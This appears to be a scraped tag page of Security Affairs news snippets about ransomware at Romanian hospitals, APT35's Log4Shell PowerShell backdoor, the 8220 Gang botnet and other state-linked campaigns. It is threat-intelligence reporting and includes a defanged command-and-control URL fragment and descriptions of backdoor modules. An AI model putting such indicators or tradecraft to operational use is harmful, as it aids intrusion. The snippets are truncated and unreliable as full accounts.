article thumbnail

A ransomware attack took 100 Romanian hospitals down

Security Affairs

Identify affected systems and immediately isolate them from the rest of the network as well as from the Internet Keep a copy of the ransom message and any other communications from the attackers. This information is useful to the authorities or for further analysis of the attack Do not shut down the affected equipment.

article thumbnail

Iran-linked APT35 group exploits Log4Shell flaw to deploy a new PowerShell backdoor

Security Affairs

The class runs a PowerShell command with a base64-encoded payload that handles communications with C2, and eventually receives and executes additional payloads. The additional modules sent by the C2 are the following: Applications Screenshot Process System information Command Execution Cleanup. amazonaws[.]com/doclibrarysales/3

Cleanup 315
Insiders

Sign Up for our Newsletter

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

article thumbnail

8220 Gang Cloud Botnet infected 30,000 host globally

Security Affairs

The 8220 group has been active since at least 2017, the threat actors are Chinese-speaking and the names of the group come from the port number 8220 used by the miner to communicate with the C2 servers. According to Microsoft researchers, the group has actively updated its techniques and payloads over the last year.

Cloud 260
article thumbnail

Red TIM Research found two rare flaws in Ericsson OSS-RC component

Security Affairs

The Operations Support Systems are all those systems used by companies that provide communication services for networks’ integrated function. Vulnerability Description : Incomplete Cleanup. – The Operations Support System – Radio and Core (OSS-RC) provides a centralized interface into the radio and core components.

Cleanup 274
article thumbnail

Android Spyware Monokle, developed by Russian defense contractor, used in targeted attacks

Security Affairs

Record audio and calls Suicide functionality and cleanup of staging files. “Command and control infrastructure that communicates with the Defender application also communicates with Monokle samples. The signing certificates used for signing Android application packages overlap between Defender and Monokle as well.”

Cleanup 265
article thumbnail

China-linked APT UNC3886 used VMware ESXi Zero-Day

Security Affairs

Once the attackers opened a communication channel between guest and host they were able to use new means of persistence to regain access to a backdoored ESXi host as long as a backdoor is deployed and the attacker gains initial access to any guest machine. ” concludes the report.

Cleanup 246
article thumbnail

China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks

Security Affairs

In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. The Volt Typhoon group has been active since at least mid-2021 it carried out cyber operations against critical infrastructure.

Cleanup 246